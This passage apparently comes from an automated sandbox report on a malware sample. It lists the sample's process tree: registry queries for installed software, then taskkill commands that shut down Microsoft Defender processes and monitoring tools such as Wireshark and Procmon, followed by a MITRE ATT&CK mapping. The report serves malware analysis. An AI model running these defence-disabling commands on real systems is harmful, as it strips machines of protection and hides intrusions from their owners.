    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4564
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4716
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4868
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4944
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:5000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:5020
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:5076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:5096
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:3804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4180
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4296
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4372
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4496
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4744
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:5008
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:5088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:5112
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4172
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4332
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4500
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4884
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5104
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4312
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4552
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4632

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/504-68-0x000000001BBF0000-0x000000001BBF4000-memory.dmp

Filesize
16KB

Download
memory/1356-112-0x00000140B43A0000-0x00000140B43A1000-memory.dmp

Filesize
4KB

Download
memory/1356-80-0x00007FFB95CC0000-0x00007FFB966AC000-memory.dmp

Filesize
9.9MB

Download
memory/1356-96-0x000001409C1D0000-0x000001409C1D1000-memory.dmp

Filesize
4KB

Download